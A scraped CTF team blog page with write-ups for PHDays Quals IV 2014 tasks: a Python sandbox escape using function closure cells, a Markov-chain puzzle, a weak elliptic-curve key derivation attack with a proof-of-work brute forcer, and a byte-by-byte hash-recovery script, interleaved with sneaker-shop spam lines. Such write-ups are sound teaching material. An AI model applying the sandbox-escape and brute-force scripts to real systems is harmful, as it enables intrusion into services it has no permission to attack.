BalalaikaCr3w - PHDays Quals IV

yet another pyjail

briskly — Sun, 02 Feb 2014 11:21:15 +0000

Category:

Event:

This task is new implementation of python sandbox.

import re
import sys
import string
from sys import stdout
sys.stderr = stdout


sanitize = re.compile(
    r'(?:__|import|globals|locals|exec|eval|join|format|replace|translate|try|except|with|content|frame|back)'
    ).sub

trusted_builtins = """
    True False type int
    """.split()


alphabet = ' \n\r0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ(),.:;<=>[]_{}'

t1 = ''.join(chr(code) for code in xrange(256))
t2 = []
for i in t1:
    if i in alphabet:
        t2.append(i)
    else:
        t2.append(' ')
trans_table = string.maketrans(t1, ''.join(t2))

EXPECTED = 13.37

del alphabet, t1, t2, i, sys, string, re


def clear_builtins():
    orig = __builtins__.__dict__.copy()
    __builtins__.__dict__.clear()
    for i in trusted_builtins:
        __builtins__.__dict__[i] = orig[i]


part1_of_flag = '******************'
part2_of_flag = '******************'
egg = 'egg'


def main():

    if raw_input() != 'leetleetleetleet':
        return

    print ('Welcome to pyjail!\n\n'
           'Try to get the flag!\n'
           'Use ctrl+D or --- to submit your code\n')

    stdout.flush()
    
    code = []
    total_bytes = 0
    while True:
        try:
            value = raw_input()
            total_bytes += len(value)
            assert total_bytes < 1337
            if value == '---':
                break
            code.append(value)
        except EOFError:
            break
    
    code = sanitize("/*ERR*/", '\n'.join(code).translate(trans_table))
    clear_builtins()

    def sandbox():

        t=r=y = t=o = s=o=l=v=e = t=h=e = d=i=v=i=s=i=o=n = q=u=i=z = 0

        def exec_in_context(ctx):
            exec code in ctx
            print 'Flag is',
            try:
                assert FLAG != part1_of_flag
                print FLAG
            except:
                print '********************'

        def we_must_be_sure_flag_part1_is_ready():
            global FLAG
            FLAG = part1_of_flag

        def we_must_be_sure_flag_part2_is_ready():
            global FLAG
            FLAG += part2_of_flag

        def divider(v1):
            
            a = "You are lucky!"
            b = "Try again!"

            def divider(v2):
                i,t,s,  n,o,t,  s,o,  h,a,r,d
                if int(v1) / int(v2) == EXPECTED:
                    print a
                    we_must_be_sure_flag_part2_is_ready()
                else:
                    print b
            we_must_be_sure_flag_part1_is_ready()
            return divider
        
        exec_in_context({'div': divider})

    sandbox()


if __name__ == '__main__':
    main()

This time deleted all built-ins except (True, False, type, int) and appended some filters:
    •__
    •import
    •globals
    •locals
    •exec
    •eval
    •join
    •format
    •replace
    •translate
    •try
    •except
    •with
    •content
    •frame
    •back"
Let's write the script that connects to server, and sends simple CAPTCHA:

hSock = create_connection((host, port))
hSock.send("leetleetleetleet\n")

After this we can send some code, that will be executed in the sandbox, as context we can see function "divider" as "div":

As we can see all attributes with "__" are restricted: so magic like "div.__dict__" will not pass! The only methods of function we can use are:
    •func_code,
    •func_defaults,
    •func_doc,
    •func_globals,
    •func_closure.
"func_globals" looks like very helpful, but string "globals" is restricted, so we need another way

After reading some manuals, comes understanding, that "func_closure" could be very useful. It returns "cell" objects, that have information about all objects declared inside the function.
"Cell" object has method cell_contents, but string "contents" is restricted again!

After a lot of research was found magic method of getting content of cell without using restricted method

def get_cell_value(cell):
    return type(lambda: 0)(
        (lambda x: lambda: x)(0).func_code, {}, None, None, (cell,)
    )()

So the 8th and 9th cells are functions, that make flag. We just need to call them

Full exploit file;

from socket import create_connection

host = "195.133.87.177"
port = 1337
hSock = create_connection((host, port))
hSock.send("leetleetleetleet\n")
print hSock.recv(1024)
print hSock.recv(1024)
t = """
global EXPECTED, a, b
a = b = 5
EXPECTED = 1
print 0, EXPECTED
def get_cell_value(cell):
    return type(lambda: 0)(
        (lambda x: lambda: x)(0).func_code, {}, None, None, (cell,)
    )()

get_cell_value(div.func_closure[8])()
get_cell_value(div.func_closure[9])()

---
"""
hSock.send(t)
print hSock.recv(1024)
print hSock.recv(1024)

Sports brands | 【国内5月2日発売予定】ナイキウィメンズエアマックスココサンダル全4色 - スニーカーウォーズ

Markoff

briskly — Sun, 02 Feb 2014 08:30:27 +0000

Category:

ppc

trivia

Event:

PHDays Quals IV

The name of this task connected to "Markov chain"

The main idea of that system is that the next state depends only on the current state, and there is a probability of transition.

First try shows, that one word phrases are shutting down the connection.

So we need to start with two word phrase. First hint is in the password:"talk_with_markov_about_positive_things".

send >> positive spam
recv << positive spam
send >> positive spam
recv << positive hack

As you can see server sometimes changes last word, and this is the main idea

We just need to write a script that will send the same string “n” times and look how last word will be changed. After scipt should send new phrase with changed last word and appended "spam" word. Result of this script is a long chain of words:

positive hack days ha_ha_not_that_easy maybe_technopandas_can_help phd technopandas techno_pandas sorry_wrong_turn techno pandas talk_with_markov_about_hacker

After some words, you can get a chain of words: "talk_with_markov_about_hacker" is a hint, to start a new chain with word "hacker" and this is the answer chain:

hacker quas wex exort yep_those_three_weird_words_are_the_flag

To take egg, you need to start chain with word "easter":

easter easter_egg dc245aad88104604acb82e566fde8ef6

Buy Sneakers | Sneakers Nike Shoes

Secc

Triff — Thu, 30 Jan 2014 21:13:26 +0000

Category:

crypto

Event:

PHDays Quals IV

Задание:

This key verification scheme is built on elliptic crypto, bet this points are

impossible.

nc 195.133.87.171 5555

password: secch4l*

Так же нам даны исходники этой схемы

Решение:

Открываем файл task.py и видим:

def main():
    print "Auth:"
 
    auth = raw_input()
 
    if hashlib.sha1(auth).hexdigest() != "375d5c01ca1b8c3863024d10aac7713472eb5033": # secch4l*
        print "nope"
        return
 
    prefix = os.urandom(8)
 
    print "Proof of work, please"
    print "Prefix is (hexed) ", prefix.encode("hex")
     
    test = raw_input().decode("hex")
     
    if not test.startswith(prefix) or len(test) > 16:
        print "nope"
        return
     
    h = hashlib.sha1(test).hexdigest()
     
    if not h.startswith("000000"):
        print "nope"
        return
     
    goflag()

Первым делом надо пройти защиту от брутфорса - сервер пришлет строчку из 8 байт и мы дожны подобрать еще не более 7 байт так, чтобы хеш от всей строки начинался с 6 нулей. Это можно легко сделать на питоне, например вот так:

#!/usr/bin/env python
from socket import create_connection
from time import sleep
import string
import hashlib
 
def findproof(prefix):
	max_len = 256**7
	 
	for i in xrange(0, max_len,1):
		if i % 100000 == 0:
			print i
		ft = hex(i)
		ft = ft[2:]
		if len(ft) % 2 != 0:
			ft = "0" + ft
		 
		footer = ft.decode("hex")
		header = prefix.decode("hex")
		 
		test = header + footer
		h = hashlib.sha1(test).hexdigest()
		if h.startswith("000000"):
			return test.encode("hex")
	print "Bad luck =("
 
conn = create_connection(('195.133.87.171', 5555));
conn.recv(1024);
conn.recv(1024);
conn.send("secch4l*\n");
sleep(0.5);
 
res = conn.recv(1024);
prefix = res.split()[-1]
 
s = findproof(prefix);
conn.send(s + "\n")
sleep(3);
 
print conn.recv(1024)
print conn.recv(1024)
print conn.recv(1024)
print conn.recv(1024)

Единственная проблема - этот скрипт будет достаточно долго искать подходящий хеш (минуты 2-3, может дольше), но в итоге сервер ответит что-то такое:

EC PASSWORD CHECK

R = (32009104608775058819477673947201651309102020463966621153833804363847565759174L, 54506028353458734953786314314179377292053505167654412444092825486798869159312L)

SHARED SECRET = R ^ PASSWORD

ENCRYPTED MESSAGE: 4c106c176590bc2f26c822ba7c164dc8d04567c15511b2fbd1

В файле task.py мы видим:

def goflag():
	print "EC PASSWORD CHECK"
	 
	r = random.randint(31337, 1 << 250)
	R = p256.power(G, r)
	 
	print "R =", R
	 
	print "SHARED SECRET = R ^ PASSWORD"
	 
	S = p256.power(R, PASSWORD)
	 
	key = p256.derive(S)
	 
	cipher = encrypt(FLAG, key)
	print "ENCRYPTED MESSAGE:", cipher.encode("hex")
 
def encrypt(msg, key):
	iv = os.urandom(8)
	stream = hashlib.sha256(iv + key).digest()
	stream = hashlib.sha256(stream + iv + key).digest()
	cipher = iv + xor(msg, stream)
	return cipher

А значит зашифрованное сообщение и есть флаг, осталось только расшифровать =)

Шифрования происходит простым xor'ом с гаммой, которая получается хешированием ключа и iv. Вектор инициализации содержится в шифртексте, значит нужно найти ключ, который получается с помощью функции derive() из известной нам точки R, возведенной в степень PASSWORD, который нам не известен.

Настало время открыть файл ecc.py. Там находится реализация эллиптической криптографии, на первый взгляд - хорошая: функции add, power выглядят правильно, кривая взята NIST'овская. Зато функция derive() вызывает подозрения:

def derive(self, p):
	return hashlib.sha256(str((p[0] << 10) / p[1])).digest()

Выражение str((p[0] << 10) / p[1]) возможно будет иметь очень плохое распределение, проверим это, добавив в derive строчку print str((p[0] << 10) / p[1]) и запустив такой скрипт:

#!/usr/bin/env python
#-*- coding:utf-8 -*-
 
import os
import random
import hashlib
 
from ecc import p256, G, s2n, xor
 
PASSWORD = s2n("adadsd")
FLAG = "111"
 
for i in xrange(0, 10000, 1):
	r = random.randint(31337, 1 << 250)
	R = p256.power(G, r)
	S = p256.power(R, PASSWORD)
	key = p256.derive(S)

В консоли мы увидим что-то вроде такого:

Видно, что числа редко превосходят даже 10000, а значит можно просто перебрать все варианты и попробовать расшифровать сообщение на каждом из них, проверяя, что в результате расшифрования получилась строка, содержащая только печатные символы. Например вот так:

#!/usr/bin/env python
#-*- coding:utf-8 -*-
 
import os
import random
import hashlib
import string
 
def xor(a, b):
	return "".join([chr(ord(a[i]) ^ ord(b[i % len(b)])) for i in xrange(len(a))])
 
encoded_msg = '4c106c176590bc2f26c822ba7c164dc8d04567c15511b2fbd1'
decoded_msg = encoded_msg.decode("hex")
 
def main():
	for i in xrange(0, 1000000,1):
		key = hashlib.sha256(str(i)).digest()
	 
		result = decrypt(decoded_msg,key)
		if all(c in string.printable for c in result):
			print result
			break
	 
def decrypt(msg, key):
	iv = msg[0:8]
	stream = hashlib.sha256(iv + key).digest()
	stream = hashlib.sha256(stream + iv + key).digest()
	cipher = xor(msg[8:], stream)
	return cipher
	 
if __name__ == '__main__':
	main()

В результате получаем:

ecc_is_too_s3cure

Флаг: ecc_is_too_s3cure

Скрипт, который выполняет всю атаку:

#!/usr/bin/env python
from socket import create_connection
from time import sleep
import string
import hashlib
 
def xor(a, b):
	return "".join([chr(ord(a[i]) ^ ord(b[i % len(b)])) for i in xrange(len(a))])
 
def findproof(prefix):
	max_len = 256*256*256*256*256*256*256
 
	for i in xrange(0, max_len,1):
		if i % 100000 == 0:
			print i
		ft = hex(i)
		ft = ft[2:]
		if len(ft) % 2 != 0:
			ft = "0" + ft
		 
		footer = ft.decode("hex")
		header = prefix.decode("hex")
		 
		test = header + footer
		h = hashlib.sha1(test).hexdigest()
		if h.startswith("000000"):
			return test.encode("hex")
	print "Bad luck =("
 
def decrypt(msg, key):
	iv = msg[0:8]
	stream = hashlib.sha256(iv + key).digest()
	stream = hashlib.sha256(stream + iv + key).digest()
	cipher = xor(msg[8:], stream)
	return cipher
 
conn = create_connection(('195.133.87.171', 5555));
conn.recv(1024);
conn.recv(1024);
conn.send("secch4l*\n");
sleep(0.5);
 
res = conn.recv(1024);
prefix = res.split()[-1]
 
s = findproof(prefix);
conn.send(s + "\n")
sleep(3);
 
res = conn.recv(1024)
 
encoded_msg = res.split()[-1]
decoded_msg = encoded_msg.decode("hex")
 
for i in xrange(0, 1000000,1):
	key = hashlib.sha256(str(i)).digest()
 
	result = decrypt(decoded_msg,key)
	if all(c in string.printable for c in result):
		print result
		break

latest Running Sneakers | Nike

Rbox

Triff — Thu, 30 Jan 2014 07:47:57 +0000

Category:

ppc

Event:

PHDays Quals IV

Задание:

Unhash this:

5ebad7dcbd73584f32ef949486a161a1e9f10e48ade43b03649a2ca680f327c4

nc 195.133.87.165 5555

Auth token: rb0xch4ll3ng3

Решение:

Подключаемся к серверу, выполнив команду "nc 195.133.87.165 5555", и видим приветствие:

RX-Box hasher v0.1

------------------

Auth:

Вводим токен:

rb0xch4ll3ng3

Enter message:

Теперь можно ввести любое сообщение, и оно будет прохешировано. Вводим разные короткие сообщения и получаем:

"0" - "3ad2b2fcdb1f39281286e7b4e4995795d8906d709e82583b51ff18c3b4c745a70ad2b2fc"

"1" - "3bd2b2fcdb1f39281286e7b4e4995795d8906d709e82583b51ff18c3b4c745a70ad2b2fc"

"00" - "3ae2b2fcdb1f39281286e7b4e4995795d8906d709e82583b51ff18c3b4c745a70ad2b2fc"

"001"-"3ae283fcdb1f39281286e7b4e4995795d8906d709e82583b51ff18c3b4c745a70ad2b2fc"

Видно, что каждый байт исходного текста отображается в один байт (два hex-символа) хеша, то есть восстановить хеш можно простым посимвольным перебором. Еще можно заметить интересный момент: длина возвращаемого хеша - 72 hex-символа, в то же время нам дано лишь 64 символа, значит нужно подобрать лишь первые 32 байта сообщения.

Далее просто пишем скрипт, который будет в цикле подключаться к серверу и подбирать хеш посимвольно.

Например такой:

#!/usr/bin/env python
from socket import create_connection
from time import sleep
import string
 
hash = "5ebad7dcbd73584f32ef949486a161a1e9f10e48ade43b03649a2ca680f327c4"
 
message = ""
end1 = 9
end2 = 2
 
for i in xrange(0,32,1):
    for c in string.printable:
        con = create_connection(('195.133.87.165', 5555))
        con.recv(1024)
        con.recv(1024)
        con.send("rb0xch4ll3ng3\n")
        sleep(0.1)
 
        con.recv(1024)
        con.send(message+c+"\n")
        sleep(0.02)
 
        res = con.recv(1024)
        if res[7:end1] == hash[0:end2]:
            message = message + c
            print message
            end1 = end1 +2
            end2 = end2 +2
            break
 
print ""
print "Message: " + message
print ""

Запускаем скрипт и видим, как он постепенно подбирает исходное сообщение. В конце работы печатается результат:

Message: The flag is b8641ac83fc85e4e44bc

Флаг: b8641ac83fc85e4e44bc

Authentic Nike Sneakers | 【国内5月1日発売予定】アンディフィーテッド × ナイキコービー 5 プロトロ "ホールオブフェイム" メタリックゴールド/フィールドパープル-マルチカラー (DA6809-700) - スニーカーウォーズ

Attachments:

rbox.py.txt